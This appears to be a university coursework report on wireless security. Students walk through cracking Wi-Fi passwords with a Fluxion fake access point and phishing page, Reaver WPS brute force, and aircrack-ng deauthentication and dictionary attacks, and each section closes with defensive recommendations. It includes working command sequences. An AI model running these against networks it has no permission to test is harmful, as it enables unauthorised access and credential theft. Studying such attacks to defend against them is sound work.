to support the hypothesis and also to expect a result from the task that carried out in the process.
Ste Task/command Description Expected result Actual result

p
1 ./Fluxion To start the After the
fluxion command is
entered, the
fluxion should
be started.
2 Select Language Select the After the
preferred selection, the
language next step will be
shown
3 Select Interface Select the After the
detected selection,
network channel will be
interface shown, if there
is no network
interface
detected fluxion
will be
terminated
4 Select Channel Select the Detect the target
channel of the Wi-Fi
targeted Wi-Fi
5 Select the target The Wi-Fi target Target is
will be visible selected and
and ready to be next step will be
selected shown
6 Select the Attack method The attack The selected
method will be attack will be
using FakeAP- shown and the
Hostapd next step will be
shown
7 Handshake location The location Handshake
handshake will location is
be stored acquired and the
next step will be
shown
8 Handshake Checking Aircrack will be Handshake is

capturing the captured by
handshake aircrack
9 Fake AP deployed Make the web The web
interface for the interface is
Fake AP ready and the
next step will be
shown
10 Obtain the password The password The password
will be shown if will be shown
the captured after checking
handshake and the captured
the password is handshake
match
11 Test the real password Test the real Gain access to
password on the the Wi-Fi
real AP
2.7. Demonstration
Figure 22 Fluxion
Figure 1 showing that after the ./fluxion command is entered the language selection will be
shown. Select the preferred language to continue.

Figure 23 Network Card Selection
The network card will be showing after the language selection. If there is no network card
detected fluxion will be terminated.
Figure 24 Scan Channel
Figure 3 shown that channel must be selected to search for the targeted Wi-Fi. There are two
option which is All channels specific channels. Select all channels to capture all the Wi-Fi in the
available channels.

Figure 25 Wifi Captured
Figure 4 showing that all of the Wi-Fi will be shown on the list because of the selection of all
channels.

Figure 26 Select Target
Figure 5 showing that our target is already scanned, select 80 to continue the process.
Figure 27 Select Attack type
The attack option will be listed out after the selection of the target, since the attack will be using
a FakeAP, select number 1 to continue the process.

Figure 28 Handshake
Figure 7 is showing that where to store the handshake location after being captured.
Figure 29 Handshake Checking
Aircrack-ng will be used to capture the handshake.

Figure 30 Handshake Method
Select Deauth all (mdk3) to disconnect all of the user inside the network, this mdk3 will make
the user to connect the FakeAP if the victim did not aware for attacking process.

Figure 31 Capturing data
The capturing process is now running, and if the handshake is already captured the handshake
corner will be filled with the handshake value.

The handshake wilbe
Figure 32 Create interface for fake AP
Since the attack is using FakeAP the Web interface is needed to make the FakeAP web interface,
so that the victim will able to type the real password to the web interface.

Figure 33 Password capturing
Figure 12 showing the password capturing process.
Figure 34 Fake AP detected
In the victims machine the FakeAP will be detected, and if the victim is not aware of this attack
the victim will chose the FakeAP.

Figure 35 Web Interface
This is the web interface for the FakeAP, here the victim will directly enter the password if they
want to connect to the network.
Figure 36 Password Captured
The handshake that already acquired will be compared to the password that victim entered at the
web interface of FakeAP. If the handshake is match with the password, the password will be
shown like in figure 15.

2.8. Evaluation
Evaluation is done manually with respect to the test plan. The process of the fluxion script
outline starts from:
A. Network Scanning, the fluxion utilizes the network interface that already set to the
monitor mode to scan nearby Wi-Fi connection. Once the target is acquired the attack can
be started.
B. Search for handshake, the Handshake will be acquired using Aircrack-ng, handshake
need to be stored so that later the handshake can be used to compared with the victim
entered password at FakeAP.
C. Using WEB interface as a social engineering technique. The web interface can
convince the victim to entered their password. This web collects the password and then
send it to the capturing process.
D. Running a fake Access Point process that matches the original. The FakeAP will show
on the Wi-Fi list of the victim, if the victim did not aware of what will happen then the
victim will access the web interface of the FakeAP.
E. Enabling the MDK3 process, is to breaks all connected user connections in the
network so that they connect to the FakeAP of the network and enter a real password.
H. Any passwords entered by the victim will be verified with a previously acquired
handshake, and the process will terminate automatically if the correct password has been
entered.
Ste Task/command Description Expected result Actual result

p
1 ./Fluxion To start the After the The fluxion is
fluxion command is running
entered, the
fluxion should
be started.
2 Select Language Select the After the The language
preferred selection, the selection is
language next step will be success and
shown showing the next
step
3 Select Interface Select the After the The interface is
detected selection, detected, fluxion

network channel will be can now scan
interface shown, if there the network for
is no network finding the
interface target
detected fluxion
will be
terminated
4 Select Channel Select the Detect the target Selected channel
channel of the Wi-Fi is showing all of
targeted Wi-Fi the wifi scanned
nearby the
attacker location
5 Select the target The Wi-Fi target Target is The target is
will be visible selected and acquired, and
and ready to be next step will be ready to be
selected shown exploited
6 Select the Attack method The attack The selected The attack
method will be attack will be option showing
using FakeAP- shown and the the password is
Hostapd next step will be successful to
shown obtain
7 Handshake location The location Handshake -
handshake will location is
be stored acquired and the
next step will be
shown
8 Handshake Checking Aircrack will be Handshake is Handshake is
capturing the captured by successfully
handshake aircrack acquired using
Aircrack-ng
9 Fake AP deployed Make the web The web The FakeAP is
interface for the interface is showing on the
Fake AP ready and the Wi-Fi list of the
next step will be victim machine
shown
10 Obtain the password The password The password Password
will be shown if will be shown successful
the captured after checking obtained
handshake and the captured because the
the password is handshake victim accesses
match the fake AP web
interface
11 Test the real password Test the real Gain access to The real
password on the the Wi-Fi password that
real AP victim entered at
the web

interface match
the captured
handshake.

2.9. Suggested solution and recommendations
1. Perform Wireless Network Testing.
Perform testing of wireless network systems periodically from vulnerability to various types of
attacks to ensure the network able and effective to minimize attacks and anticipate existence an
illegal user or a wild access point (rogue AP).
2. Turn off SSID Broadcasting.
Access Point will send a code that tells its whereabouts. The code commonly known as the
Extended Service Set Identifier (ESSID or SSID) is commonly used to call the wireless network.
The function of ESSID is to facilitate the client to know the existence of Access Point. By
default, the SSID of WAP will be broadcasted. This matter will allow users to find the network,
because the SSID will appear in the list of available networks available on the wireless client.
SSID is also a weak point that is often used by the intruders. With ESSID emitted, the intruders
can find out the existence of Access Point for subsequent attacks. If the SSID is turned off, the
user must first know the SSID to connect to the network. If the wireless network is Point-to-
Point or private, you should turn off SSID broadcasting. As a result, each client must be inserted
the SSID manually. Without entering the proper ESSID, the client will not be able to connect to
Access Point.
3. Isolating Wireless Network from Lan.
To protect the internal network cable from the threats coming from the wireless network, need a
wireless DMZ that isolate from the LAN. Meaning is to install a firewall between wireless
network and LAN. If a wireless client requires access to the internal network, it must
authenticate first with a RAS (Remote Access Service) server or using a VPN (Virtual Private
Network).
4. Controlling the Wireless Signal.
An Access Point usually has a certain range. On some models usually use a BNC type connector
for the antenna. Access Point which uses this connector is relatively more flexible because you
can replace antenna as needed. A good antenna can provide more coverage far and more focused.

Several types of antennas exist that are specially designed for cover a certain area. The security
aspect that can be utilized is use of antennas to limit the coverage of wireless networks. So only
areas within a certain range that will get wireless network signals.
This method is not easy, because you have to experiment at many points to make sure your
wireless signal is not "leaking" out of that area desired. However, the security side of this method
is very effective. For the intruders do not get a signal from your Access Point, then it can you
will be safe from interference. Directional antenna will radiate signals in a particular direction,
and the radiation is not circular as it happens in omnidirectional antennas that are usually present
on WAP standard packets. in addition, there are several WAPs that can be set in signal strength
and direction through the WAP configuration.
5. Security Awareness
The attacker will not be able to get a password from the network that being hacked, if the user
understands about social engineering. It is very suspicious when you want to re-enter the
password on the fake network, where the victim will be redirected to re-enter through the
browser. It is very important for the user to learn about data security and increase their security
awareness. The last line of defense is the user if the user can not identify the attack characteristic,
then their data is at risk.

2.10. References
Chaudhary, S., 2016. Hacking WPA/WPA2 without dictionary/bruteforce : Fluxion. [Online]
Available at: http://www.kalitutorials.net/2016/08/hacking-wpawpa-2-without.html
[Accessed 25 06 2017].
Kali Linux, n.d. What is Kali Linux ?. [Online]
Available at: https://docs.kali.org/introduction/what-is-kali-linux
[Accessed 25 06 2017].
Sadmin, 2017. Capturing WPA Passwords by Targeting Users with a Fluxion Attack. [Online]
Available at: https://null-byte.wonderhowto.com/how-to/hack-wi-fi-capturing-wpa-passwords-
by-targeting-users-with-fluxion-attack-0176134/
[Accessed 25 06 2017].
vmware, n.d. What Is a Virtual Machine?. [Online]
Available at: https://pubs.vmware.com/vsphere-50/index.jsp?topic=
%2Fcom.vmware.vsphere.vm_admin.doc_50%2FGUID-CEFF6D89-8C19-4143-8C26-
4B6D6734D2CB.html
[Accessed 25 06 2017].

3. Cracking home router Wi-Fi password with Reaver (Anthony
Wibowo TP031822)
3.1. Introduction
The development in wireless technology (wireless) in the era of data communication is
increasingly fast has brought the community through several stages of technological
development at once. The first generation of (1G) wireless development in mark with the
development of analog systems with low speed (low speed) and voice as the main object. There
are two examples of wireless technology development in this first phase is NMT (Nordic Mobile
Telephone) and AMPS (Analog Mobile Phone / System).
The second generation is (2G) wireless technology development made commercial standard with
digital format, low speed (Medium). Example: GSM and CDMA2000 1xRTT. Before entering
into the development of third generation technology (3G), there are those who insert a
development of Generation 2.5 (2.5G) i.e. wireless data communications technology in digital,
speed up (up to 150 Kbps). 2.5 G category technology is a data-based service such as GPRS
(General Packet Radio Service). And EDGE (Enhance Data rate for GSM Evolution) on GSM
and PDN domains (Packet Data Network) on CDMA domain.
The next stage of development is the third generation, high-speed digital generation, capable of
high-speed data transfer, capable of high-speed data transfer and multimedia applications, for
broadband. Example: W-CDMA (also known as UMTS) and CDMA2000 1xEV-DO.
The next generation is the development of 3G is a 4G (fourth generation). 4G is the abbreviation
of the English term (fourth-generation technology). This term is generally used to refer to the
fourth-generation standard of mobile phone technology. There are two standard candidates for
commercialized 4G in the world that is the standard WiMAX (South Korea Since 2006) and the
standard Long Term Evolution (LTE) (Sweden Since 2009).

3.2. Application of Wireless Technology Applications
Wireless technology is now widely developed which integrated between peripheral hardware to
software. The functions are very diverse, ranging from data sharing media or also to internet
connection on the computer / Netbook / Mobile. We Wireless technology is a wireless
technology, in conducting telecommunication relations no longer use media or cable means but
by using electromagnetic waves instead of wires. The development of wireless technology is
growing and growing rapidly, where every time we always need the means of
telecommunications. This is evidenced by the number of mobile phone users, in addition to
developing wireless technology used for internet access.
Some examples of wireless technologies are:

 Infrared (IR), electromagnetic radiation of wavelengths longer than visible light, but
shorter than radio wave radiation.
 Wireless wide area network (Bluetooth), industry specification for private area networks
(personal area networks or PAN) wirelessly. Bluetooth connects and can be used to
exchange information between devices.
 Radio frequency (RF), points to the electromagnetic spectrum in which electromagnetic
waves can be generated by providing alternating current to an antenna.
 Wireless personal area network, generally has a maximum communication distance of
10m only, shorter than the Wireless Local Area Network (WLAN).

 Wireless LAN (802.11), a wireless network that uses radio frequencies for
communication between computer devices and ultimately the access point that is the
basis of a two-way radio transference that typically works at 2.4 GHz (802.11b, 802.11g)
or 5 GHz bandwidth ( 802.11a). Most equipment have Wi-Fi qualification, IEEE 802.11b
or IEEE 802.11g accommodation and offer several security levels such as WEP and / or
WPA. From some examples of wireless technology above, I will explain one of them,
namely Infrared. Infrared can be utilized in several areas, namely health,
communications, spatial, and industry.
3.3. Wi-Fi Security in General

Network Data Encryption
Network security typically uses the encryption technology protocol. Encryption scrambles data
sent over a network connection to hide information from humans while still allowing the
computer to properly decipher messages. Many forms of encryption technology exist in the
industry.
Network Authentication
Authentication technology to verify the identity of computer network devices and network
operating. System such as Microsoft Windows and Apple OS X includes built-in support
authentication based on username and password. The front of the network router also
authenticates the administrator by requiring them to enter a separate login.
Ad Hoc Wi-Fi Network Security
Traditional Wi-Fi network connection through the router or other wireless access point.
Alternatively, Wi-Fi supports a mode called wireless ad hoc that allows devices to connect
directly to each other in peer to peer mode. Because it does not have a central connection point,
the hoc Wi-Fi connection ad security tends to be low. Some experts suggest the use of ad-hoc
Wi-Fi networks for this reason. General Wi-Fi Security Standard Most Wi-Fi devices including
computers, routers and telephones support multiple security standards. The types of security
available and even their names vary depending on the capabilities of a device.

3.4. Hypothesis
Based on my condition, I will assume the situation as below:
1) My router is TP-Link brand, it will be secured by WPS, WPS stands for Wi-Fi Protected
Setup and it is a wireless networking standard that tries to make connections between a router
and wireless devices faster and easier (Digitalcitizen.com, 2014).
2) The router will be created a password to make authentication for accessing, the password
strength will be high the length is made by 24 characters.
3) The Attracter machine will using notebook.
4) The attack of environment is under the Kali-Linux operating system, and it will also be
running in the Virtual machine environment. Under this kind of environment, we will not bring
any “side-effect” on my original working system. And the Kali-Linux is also suitable for hacking
jobs.
5) The hacking application will be the Reaver. Reaver implements a brute force attack against
Wifi Protected Setup (WPS), Reaver has been designed to be a robust and practical attack against
WPS, and has been tested against a wide variety of access points and WPS implementations
(Kali, 2014).
3.5. Tools
Hardware
 Asus A46C
- Intel® CoreTM i5-3317U
- 4GB RAM, 500GB HDD
- NVIDIA® GeForce GT 635M (2GB VRAM)
 Ralink RT2870
- 802.11abgn Long-Range USB Adapter;
- Dual-Band 2.4GHz / 5GHz;
- Speed up to 150Mbps
 TP-Link Router – WR886N
-Dual-Band 2.4GHz/5GHz
-Speed up to 450Mbps

Software
 Windows 10
 VMWare Workstation 12.0
 Kali Linux 64Bit
 Reaver
3.6. Test Plan

Aim
Use existing tool (Reaver in KALI Linux), to conduct the Wi-Fi password cracking in the Virtual
machine under the Kali-Linux environment successfully.
Objective
1) To figure out how it works through using Reaver to crack the vulnerability of Wi-Fi network;
2) To figure out how to prevent the Wi-Fi security cracking under the existing Wi-Fi security
strategy;
3.7. Demonstration
1. Start Kali Linux and open a terminal window

2. Run the command “airmon-ng” to see if Kali recognizes your wireless USB adapter. It
should show “Wlan0” along with the chipset, if it doesn’t then some troubleshooting will
have to be done until it does.

3. Once the wireless USB adapter is working we need it enabled. To do this run the
following command “airmon-ng start wlan0”
4. Then make a new folder, mkdir /etc/reaver
5. Type was -1 mon0 –C

6. Copy the BSSID, to paste it when needed later, then press CTRL+C to stop the terminal
window using the wireless USB adapter.
Now we can get to using Reaver. Be sure the terminal window running the “wash” command is
not actively using the wireless USB adapter by pressing CTRL+C inside of it. You can copy and
paste the BSSID.
7. Open new terminal, in this new terminal window run the following command.
reaver -i mon0 -b (Target BSSID) –vv

8. Reaver should start run

Reaver start to brute force the password, it may takes time, and in this case need until 8 hours to
found the password, below is the screenshot of the password.
3.8. Solution and Recommendation

1. Avoid Creating a Common Password
The first way should be to avoid making passwords that other people (the market) use
commonly. By creating a market password that means we have given a great opportunity against
others to break into our personal account. What is an example of a market password? For
example for WordPress password by default is "admin", then if you are a WordPresser of course
do not ever use this password. Or for example again because you do not want to make a difficult
password then you create account password with a row of numbers 1 to 9 only ( 123456789 ).
2. Do not Use English Words

Does making passwords with English words are completely safe? It is not safe at all if the
password we create uses the English word. Hackers will examine the password of a person's
account with the method of Dictionary Attack, meaning it will try to randomize the word that
comes from the English word. Avoid creating passwords with popular English words like
ILoveYou, IMissYou, GoodBye, GoodMorning, Thankyou, and so on.

3. Create a Long Password
Long passwords are assumed to have a high level of security. Therefore for your account
password is very strong then make a long password. The longer the password you create the
harder it will be hackers will hack your account. Minimum password created has 8 characters
and a maximum of 16 characters. If possible more is better as long as you remember just the
same password.
4. Combine with Figures, Letters, and Characters

To avoid the Dictionary Attack method when hackers try to hack into your personal account then
create a password based on a combination of numbers, letters, and special characters. If you
create a password based on ordinary letters then it will be a little choice in combining it. Because
the number of regular letters is only 26 characters only. Different if you use all the characters in
the keyboard, which has 95 letters. You can be free to create passwords if they are based on a
mixture of numbers, letters, and characters. Just imagine if a password like this: 586Mhhjk! @
K8 & of course it will be very difficult others guess.

3.9. References
Adones Pitogo - Blog. (2017). Hacking Wifi with Kali and Reaver. [online] Available at:
http://www.adonespitogo.com/articles/hacking-wifi-with-kali-and-reaver/ [Accessed 25 Jun.
2017].
Anon, (2017). [online] Available at: http://www.kalitutorials.net/2014/04/hack-wpawpa2-wps-
reaverkali-linux.html [Accessed 25 Jun. 2017].
Coding Security. (2017). Hacking wifi using reaver kali linux - Coding Security. [online]
Available at: https://codingsec.net/2016/04/hacking-wifi-using-reaver-kali-linux/ [Accessed
25 Jun. 2017].
PCMAG. (2017). 12 Ways to Secure Your Wi-Fi Network. [online] Available at:
http://www.pcmag.com/article2/0,2817,2409751,00.asp [Accessed 25 Jun. 2017].
Tools.kali.org. (2017). Reaver | Penetration Testing Tools. [online] Available at:
https://tools.kali.org/wireless-attacks/reaver [Accessed 25 Jun. 2017].

4. Cracking home router Wi-Fi password with Dictionary Attack (Yanto
TP032242)
4.1. Introduction
One of the most popular and widely used telecommunications technologies is wireless
technology. Wireless technology does have some advantages which is simple and practical.
People do not have to bother pulling the network cable for the computer to enjoy the internet
facility. Wireless technology is widely applied in many public places such as Mall, airports,
hotels, cafes, campuses, offices, public parks and even housing residents.
Aside from it's simple and practical benefit, WIFI networks have more weaknesses than wired
networks. Many wireless service providers such as commercial hotspots, ISPs, Internet cafes,
campuses and offices have begun to utilize WIFI on their respective networks, but very few are
concerned about the security of data communications on the wireless network. This makes the
hackers become interested to explore his ability to perform various illegal activities such as
cracking the WIFI password.
4.2. Hypothesis
Based on occupytheweb [CITATION occ16 \n \l 1033 ], WPA2-PSK system has a weakness
that made the user able to grab the encrypted password when the 4-way handshake is occurring.
This 4-way handshake is done when a client is trying to authenticate their self to the access point.
When the encrypted password is captured, the most common way to crack the password are
either brute force or dictionary attack. In here, it is hypothesized that attacker is always able to
gain the password if the used password is short in combination or using general password. The
stronger the dictionary of the attacker, the possibility of the success attack is higher.

4.3. Aim
The aim of this testing is to check whether cracking password with dictionary attack can be done
if the dictionary is strong.
4.4. Objectives
To capture the 4-way handshake of the client and the access point
To crack the captured password by using dictionary attack
4.5. Test Plan

Task ID Task Name Objective Expected Result
1. Run ifconfig command in the To check whether the Wlan0 is printed
Kali Linux External Wireless card is
connected
2. Run airmon-ng start wlan0 To start the wireless card Wlan0 become
into monitor mode wlan0mon
3. Run Airodump-ng wlan0mon To monitor all the Statistics about the
transmission activities transmission is
printed.
4. Run the Airodump-ng with To monitor the connected Statistics about the
selected BSSID client client is printed.
5. Run aireplay-ng –deauth To de-authenticate all the Client is disconnected
client and let them redo the and 4-way handshake
4-way handshake is captured when the
client reconnected.
6. Run Aircrack-ng .cap file To crack the password of Password is printed.
and the dictionary file the authentication
4.6. Crack Tool Used

Aircrack-ng [CITATION Air17 \n \l 1033 ] is a tool that used to assess a Wi-Fi network, it is
mostly used to monitor packets, vulnerability testing, and cracking. This tool can be used for
heavy scripting which improves the usage of the tool. It works primary in Linux operating
system, but also can be used by Windows and Mac OS. Aircrack-ng can be used to sniff packet
and capture the 4-way handshake which is needed in this testing.

It supports many monitoring mode and able to sniff 802.11a, 802.11b, 802.11g. One of the main
advantages of using Aircrack-ng is it have many features and always used by professional
penetration tester.
4.7. Tool comparison

Aircrack-ng AirSnort
Active Monitor (Able to inject the access Passive Monitor
point)
Highly used and optimized Popular the usage rank still below Aircrack-
ng
Always updated, hence following the latest Have not been updated for 4 years.
technology.
Source: [ CITATION Zay16 \l 1033 ]

4.8. Hardware and Software
- TP-Link TL-WN722N as the Wireless Card
- Laptop
- VirtualBox with Kali Linux
- Airmon-ng, Airodump-ng, and Aircrack-ng
- Aircrack-ng Screenshot
4.9. Demonstration of Tool

1. Connect the external Wireless Card
2. Start Kali Linux and check whether the card is connected. Check by issuing command
‘ifconfig’, if wlan0 is printed, then the card is connected.

3. Start the monitor tool by issuing command airmon-ng start wlan0, if there is processes
that able to cause trouble as specified by the tools, kill the process by kill command.
4. Check whether the monitor mode is activated by ifconfig command. Below figure shows
that wlan0 has become wlan0mon which mean the wireless card is changed to monitor
mode now.

5. Issue command airodump-ng wlan0mon to monitor all the surrounding packets.

6. Start monitoring on the target access point. In here which is BSSID 70:62:B9:E6:30:6A
will be chosen as the victim. Issue command airodump-ng –bssid 70:62:B9:E6:30:6A -c
7 –write crack
7. Open new tab and de-authenticate the client so it will try to make new handshake. De-
auth by issuing command aireplay-ng –deauth 100 -a 70:62:B9:E6:30:6A wlan0mon

8. After the handshake is captured crack the .cap file by issuing command aircrack-ng
crack01.cap -w pass.txt. The below figure show that the key is found and printed to the
attacker.

4.10. Evaluation
The above test shows that it is not that hard for an attacker to gain access point password. They
just need a connected client which then will be kicked out from the network. Then the tool will
monitor for new connection and capture the handshake. This handshake then will be compared to
an encrypted password from a dictionary file given. If there is a match of the password, it will
print out the password to the attacker. Then the attacker able to connect to the access point as an
authenticated client.
4.11. Solution and Recommendation

The solution for the above problem is to use a long password and using different character
combination. It is good to have password length more than 10 and contain at least one upper case
letter, one lower case letter, one number, and one symbol. Then avoid using common English
words, this is as the dictionary attack is always guessing from name, number, and common
English words. Usually, a strong password will make the dictionary type attack fails. Even if the
dictionary file is very large which is in Gigabytes size, it will also consume time as much as the
brute force attack. The network administrator also recommended to always change the wireless
password several times in periodical time.

4.12. References
Aircrack-ng, 2017. Aircrack-ng. [Online]
Available at: https://www.aircrack-ng.org/
AlJaberi, Z., 2016. Top 20 Wireless hacking tools. [Online]
Available at: https://www.linkedin.com/pulse/top-20-wireless-hacking-tools-zayed-aljaberi
occupytheweb, 2016. Cracking WPA2-PSK Passwords Using Aircrack-Ng. [Online]
Available at: https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-
passwords-using-aircrack-ng-0148366/

WMSS Documentation Full

Uploaded by

Copyright:

Available Formats

WMSS Documentation Full

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

WMSS Documentation Full

Uploaded by

Copyright:

Available Formats

What tools were used for the network scanning and analysis?

What tools were used for the network scanning and analysis?

What vulnerabilities were tested?

What vulnerabilities were tested?

Table of Contents

Network Site Survey – Group Part..................................................................................................4

2. Overview of Selected Site.......................................................................................................4

2.1. Photos of Site Interior.......................................................................................................5

2.2. Photo of the Access Point.................................................................................................6

3. Site Survey Specification and Analysis...................................................................................6

3.1. Site Survey Specification..................................................................................................6

3.2. Overview of Tools............................................................................................................7

3.3. Access Point Analysis.......................................................................................................7

3.4. Network Heat Map – Ekahau..........................................................................................10

3.5. Access Point Specification..............................................................................................11

4. Penetration Testing on Site....................................................................................................12

4.1.2. Type of Jamming Type............................................................................................12

4.1.3. How to Handle Jamming.........................................................................................13

4.1.4. How the jamming device works..............................................................................14

4.2. Rogue Access Point........................................................................................................15

Vulnerability Testing – Individual Part.........................................................................................18

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 1

1.5. Network Scanning Tool: Nmap (Network Mapper).......................................................19

1.6. Comparison between Network Scanner..........................................................................20

1.7. Hardware, Software and Configuration..........................................................................21

1.8. Nmap Screenshot............................................................................................................21

1.9. Test Plan..........................................................................................................................23

1.10. Demonstration of Tool................................................................................................24

1.12. Suggested Solutions and Recommendation................................................................32

2.5.3. Tools For conducting the vulnerability testing (Comparison).................................37

2.6. Test Plan..........................................................................................................................38

2.9. Suggested solution and recommendations......................................................................51

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 2

3.2. Application of Wireless Technology Applications.........................................................55

3.3. Wi-Fi Security in General...............................................................................................56

3.6. Test Plan..........................................................................................................................58

3.8. Solution and Recommendation.......................................................................................63

4.5. Test Plan..........................................................................................................................67

4.6. Crack Tool Used.............................................................................................................68

4.7. Tool comparison.............................................................................................................68

4.8. Hardware and Software...................................................................................................69

4.9. Demonstration of Tool....................................................................................................69

4.11. Solution and Recommendation...................................................................................74

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 3

2. Overview of Selected Site

Figure 1. APU New Campus 6th Floor.

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 4

Figure 2. One of the lab in 6th floor.

Figure 3. Access Point that placed in the middle of the lab.

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 5

Figure 4. Ruckus Wireless Access Point.

3. Site Survey Specification and Analysis

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 6

3.3. Access Point Analysis

Figure 5. Network Analysis with Acrylic Wi-Fi.

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 7

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 8

Figure 8. Homedale Network Analysis.

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 10

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 11